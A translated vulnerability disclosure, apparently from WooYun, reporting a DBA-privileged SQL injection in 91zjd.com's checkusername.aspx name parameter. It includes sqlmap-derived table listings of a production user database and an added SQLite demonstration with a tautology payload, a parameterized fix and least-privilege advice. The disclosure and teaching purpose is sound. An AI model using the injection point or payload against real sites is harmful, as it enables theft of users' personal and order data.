2015-10-03: Details reported to the vendor; awaiting vendor handling
2015-10-13: Vendor proactively ignored the vulnerability; details disclosed to the public

Zijindao game main site: DBA-privilege SQL injection exposes 2 million user records and 10 million user order records
Injection point: http://www.91zjd.com/checkusername.aspx?name= . Appending a single quote to the name parameter makes the page return a raw database error, as shown:
sqlmap screenshot:
Current database:
DBA privileges:
Table sizes in the current database: dbo.UserMemberOrder (10,342,305 rows) holds roughly 10 million user order records, and dbo.View_Userinfo_ME (2,172,389 rows) holds 2 million+ user records.
Database: QPGameUserDB
+----------------------------------+-----------+
| Table                            | Entries   |
+----------------------------------+-----------+
| dbo.View_UserALLLogo_bySpid      | 116799666 |
| dbo.UserMemberOrder              | 10342305  |
| dbo.View_UserFristLogo           | 7304127   |
| dbo.View_VWUserFristLogo         | 7200557   |
| dbo.View_UserLogoNew             | 7010453   |
| dbo.GoldEggsLog2012              | 3307940   |
| dbo.View_Userinfo_ME             | 2172389   |
| dbo.IndividualDatumScore         | 2142378   |
| dbo.GoldEggsLog20110             | 540730    |
| dbo.Yjt_accounts                 | 500000    |
| dbo.View_CZK_TG                  | 357304    |
| dbo.Rechargeable_Card_TEST       | 356249    |
| dbo.DailyLogonPrize              | 307370    |
| dbo.ShortUrlLink                 | 178294    |
| dbo.accountsinfo20110101         | 117381    |
| dbo.QQcdkey                      | 99694     |
| dbo.IndividualDatumFirend        | 78305     |
| dbo.AccountsInfo0821             | 76835     |
| dbo.AccountsInfo_temp1           | 54253     |
| dbo.View_Rechargeable_Card_tg    | 14130     |
| dbo.AccountsInfo_emailbak        | 11156     |
| dbo.GameIdentifier               | 10001     |
| dbo.UserWincountlogo             | 8250      |
| dbo.iphonetemp1                  | 6195      |
| dbo.iphonetemp2                  | 4774      |
| dbo.AccountsInfo1121             | 4569      |
| dbo.dxuserall                    | 3148      |
| dbo.GameUserBang_TYBLogo         | 2358      |
| dbo.SystemStreamInfo             | 2325      |
| dbo.AccountsInfo_regtj           | 2253      |
| dbo.View_AccountsInfo_regtjNew   | 2253      |
| dbo.tempUsername                 | 2079      |
| dbo.dxUserbak                    | 1651      |
| dbo.GameUserBang_abestLogo       | 1465      |
| dbo.GameUserBang_abest_view      | 748       |
| dbo.AccountsInfobak              | 736       |
| dbo.IndividualDatumbak           | 550       |
| dbo.PK_SOURCE_IP_POOL            | 541       |
| dbo.LuckUser                     | 393       |
| dbo.AccountsInfo_xt              | 352       |
| dbo.UserAddScoreLogo             | 325       |
| dbo.VW_Charge_List               | 300       |
| dbo.dxuserlist                   | 209       |
| dbo.S3_Tmp                       | 156       |
| dbo.GameUserBang_New_tyb         | 93        |
| dbo.GameUserBang_TYB_WEEKLY_view | 93        |
| dbo.View_t1                      | 47        |
| dbo.test_0801                    | 46        |
| dbo.tempcity                     | 41        |
| dbo.we                           | 35        |
| dbo.View_t320                    | 29        |
| dbo.comd_list                    | 26        |
| dbo.ConfineContent               | 26        |
| dbo.D99_CMD                      | 24        |
| dbo.D99_Tmp                      | 22        |
| dbo.PK_GameDownloadCount         | 19        |
| dbo.View_t500                    | 17        |
| dbo.View_t310                    | 14        |
| dbo.ConfineAddress               | 3         |
| dbo.PK_WebPage_Click_Count       | 3         |
| dbo.SystemStatusInfo             | 2         |
| dbo.D99_REG                      | 1         |
| dbo.DIY_TEMPCOMMAND_TABLE        | 1         |
+----------------------------------+-----------+
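The failure mode described above (a single quote in name producing a raw database error, and the consequence of building SQL by string concatenation), as an added Python example that is not code from the report or from the 91zjd.com site. It uses SQLite in place of the target's SQL Server so it runs offline, with a constructed two-row users table and assumed column names; check_username_vulnerable is a hypothetical reconstruction of a checkusername-style handler, not the site's actual code, and check_username_fixed is the bound-parameter form of the same check.

```python
import sqlite3

# Constructed sample data standing in for the real user table. The target in
# the report is Microsoft SQL Server; SQLite is used only so this runs offline.
# The table and column names are assumptions, not taken from the report.
SAMPLE_USERS = [("alice", "a@example.com"), ("bob", "b@example.com")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def check_username_vulnerable(conn, name):
    """Hypothetical reconstruction of a username-availability check that
    concatenates the request parameter into the query string, the pattern
    behind the report's checkusername.aspx?name= finding."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + name + "'"
    return conn.execute(sql).fetchone()[0]


def check_username_fixed(conn, name):
    """Same check with a bound parameter: the name is data, never SQL text."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (name,)).fetchone()[0]


def probe(conn, fn, name):
    """Run fn and report ('ok', count) or ('error', message). This is what the
    single-quote test in the report observes from outside: a database error
    leaking through the page instead of a normal response."""
    try:
        return ("ok", fn(conn, name))
    except sqlite3.Error as e:
        return ("error", str(e))


def demo():
    conn = make_db()
    results = {}
    # 1. The single-quote probe. The concatenating code yields a SQL syntax
    #    error (the unbalanced quote), which is the raw error the report saw.
    #    The parameterized code simply looks for a user literally named alice'.
    results["vuln_quote"] = probe(conn, check_username_vulnerable, "alice'")
    results["fixed_quote"] = probe(conn, check_username_fixed, "alice'")
    # 2. A tautology payload turns an existence check for one username into a
    #    count of every row in the table (2 here, i.e. the whole table), the
    #    first step toward the row counts and dumps shown in the report.
    payload = "x' OR '1'='1"
    results["vuln_tautology"] = probe(conn, check_username_vulnerable, payload)
    results["fixed_tautology"] = probe(conn, check_username_fixed, payload)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(label, outcome)
```

Parameterization removes the injection but not the blast radius. The report shows the application's database login holding DBA rights, which is why one error-prone parameter on a username check exposed every table in QPGameUserDB; the same bug against a least-privilege login that can only read the one table the check needs would have far less to hand over. Both fixes belong together.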
Severity: no impact (vendor ignored)
Ignored at: 2015-10-13 09:00
Vulnerability Rank: 20 (WooYun rating)
None at present.